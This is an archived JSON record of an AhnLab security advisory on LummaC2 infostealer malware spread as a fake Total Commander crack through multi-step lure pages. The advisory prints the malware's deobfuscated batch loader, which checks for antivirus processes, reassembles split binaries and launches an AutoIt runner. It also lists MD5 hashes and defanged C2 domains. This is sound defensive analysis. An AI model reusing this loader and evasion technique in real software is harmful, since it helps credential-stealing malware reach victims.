{
	"id": "fbc5fb34-e9d9-41fe-b157-6ed328d4f87b",
	"created_at": "2026-04-06T03:36:32.767437Z",
	"updated_at": "2026-04-10T03:21:33.798495Z",
	"deleted_at": null,
	"sha1_hash": "1872e07b66933c89506007ffe760cb599a14c151",
	"title": "LummaC2 Malware Distributed Disguised as Total Commander Crack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4327510,
	"plain_text": "LummaC2 Malware Distributed Disguised as Total Commander Crack\r\nBy ATCP\r\nPublished: 2025-02-18 · Archived: 2026-04-06 03:20:30 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has discovered the LummaC2 malware being distributed disguised as the Total Commander tool. Total Commander is a file manager for Windows that supports various file formats. It offers convenient file management features such as copy and move operations, advanced search using strings within files, folder synchronization, and FTP/SFTP support. The tool offers a one-month free trial, after which users are required to purchase a full version (license).\r\nhttps://asec.ahnlab.com/en/86435/\r\nPage 1 of 9\r\nFigure 1. Total Commander\r\nSearching “Total Commander Crack” on Google displays a post about downloading a cracked version. Clicking the post opens a Google Colab drive page that prompts the user to click a download button. Following the flow shown in Figure 2 to Figure 5, the user is led through multiple page transitions before finally arriving at the location where the threat actor has uploaded the file. These page transitions do not occur through automatic redirection; the user has to read each post and click its link to download the malware disguised as a crack. This means the attack specifically targeted users who intended to download the cracked software. The care taken in the attack can be seen in the page disguised as a Reddit community thread: both the post requesting a cracked version of Total Commander and the reply to it contained hyperlinks.\r\nFigure 2. Search result of “Total Commander Crack” on Google\r\nFigure 3. Download page 1 – Google Colab drive\r\nFigure 4. Page 2 of the download page – disguised as a Reddit post\r\nFigure 5. Download page 3 – final download page\r\nThe ZIP file downloaded through the link is double-compressed, containing a RAR file inside, and it is password-protected.\r\nFigure 6. Compressed file being downloaded and its contents\r\nThe user is prompted to install the “installer_1.05_38.2.exe” file, which infects the system with LummaC2 when executed. This malware is a heavily obfuscated version of LummaC2 that has been packed in multiple layers using NSIS and AutoIt scripts. When the file is executed, the NSIS script runs first. This script uses the ExecShell command to execute a batch script via cmd. The highlighted part in Figure 7 shows how a variable is inserted into the middle of a string. When the value of the variable is substituted at runtime, the following command is executed.\r\nExecShell open cmd \"/c copy Nv Nv.cmd \u0026 Nv.cmd\"\r\nFigure 7. NSIS script\r\nThe batch script is obfuscated as shown below: characters are stored in variables that are then inserted into the middle of commands, and meaningless strings are added in the middle of the commands to make the script harder to read.\r\nFigure 8. Nv.cmd (Batch script)\r\nThe deobfuscated script is shown below; it is relatively short.\r\nSet VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=Olympic.com\r\nSet RRddJNCtGgRY=\r\nSet FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=5\r\ntasklist | findstr /I \"opssvc wrsa\" \u0026 if not errorlevel 1 ping -n 194 127.0.0.1\r\nSet /a Fires=363926\r\ntasklist | findstr \"AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth\" \u0026 if not errorlevel 1 Set VOqMytMZEm\r\ncmd /c md Fires\r\nextrac32 /Y /E Schools\r\n\u003cnul set /p =\"MZ\" \u003e Fires\\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT\r\nfindstr /V \"LIL\" Cir \u003e\u003e Fires\\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT\r\ncmd /c copy /b Fires\\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT + Religion + Consisting + Stuart + Police + Turns + Constit\r\ncd Fires\r\ncmd /c copy /b ..\\Hebrew + ..\\Fla + ..\\Mtv + ..\\Novel + ..\\Suffer + ..\\Update + ..\\Msn NRRddJNCtGgRY\r\nstart VOqMytMZEmITmzXaSwyTLVZwsCxvDeT NRRddJNCtGgRY\r\ncd ..\r\nchoice /d y /t FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz\r\nAnalysis shows that a legitimate AutoIt executable (the runner) and a compiled AutoIt (.a3x) script are executed. The cmd file that NSIS runs on initial execution is a single file, whereas the .a3x script and the AutoIt executable that acts as a runner for it are split across multiple files, which the batch script reassembles with copy /b. Refer to Figure 9 below to see how the files are divided.\r\nFigure 9. Divided binary file\r\nThe LummaC2 malware that is ultimately executed is stored encrypted within the .a3x file, as shown in Figure 10. It is decrypted at execution time and loaded into memory. Both the encrypted malware binary and the shellcode that decompresses and loads it are included within the AutoIt script. This method of wrapping malware in an AutoIt script is commonly used by threat actors. For more information on this technique, please refer to the following posts: [1][2]\r\nFigure 10. Script decompiled from the .a3x file\r\nLummaC2 is an information-stealing malware that has been actively distributed since early 2023. It is mainly disguised as illegal programs such as cracks and serials. When a system is infected with LummaC2, sensitive information such as browser-stored account credentials, email credentials, cryptocurrency wallet credentials, and auto-login program credentials is sent to the threat actor’s C\u0026C server. The stolen information may be traded on the dark web or used in secondary attacks, causing additional harm. There have been continuous reports of data breaches in which the theft of information from a personal PC led to an attack on a corporate system. For more information on LummaC2, please refer to the following posts: [3], [4], [5], [6], and [7].\r\nIt is recommended to download software only from official distribution sites. Extra caution is advised when using software from unknown sources.\r\nMD5\r\n0a2d4bbb5237add913a2c6cf24c08688\r\n0da35eeccb9746a77d6b20dfdd01e1e1\r\n12087e91e60f195b2bc69b819978690e\r\n1f13356efe44af196602fc3438889d16\r\n25728e657a3386c5bed9ae133613d660\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//affordtempyo[.]biz/\r\nhttp[:]//hoursuhouy[.]biz/\r\nhttp[:]//impolitewearr[.]biz/\r\nhttp[:]//lightdeerysua[.]biz/\r\nhttp[:]//mixedrecipew[.]biz/\r\nSource: https://asec.ahnlab.com/en/86435/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/86435/"
	],
	"report_names": [
		"86435"
	],
	"threat_actors": [],
	"ts_created_at": 1775446592,
	"ts_updated_at": 1775791293,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1872e07b66933c89506007ffe760cb599a14c151.pdf",
		"text": "https://archive.orkl.eu/1872e07b66933c89506007ffe760cb599a14c151.txt",
		"img": "https://archive.orkl.eu/1872e07b66933c89506007ffe760cb599a14c151.jpg"
	}
}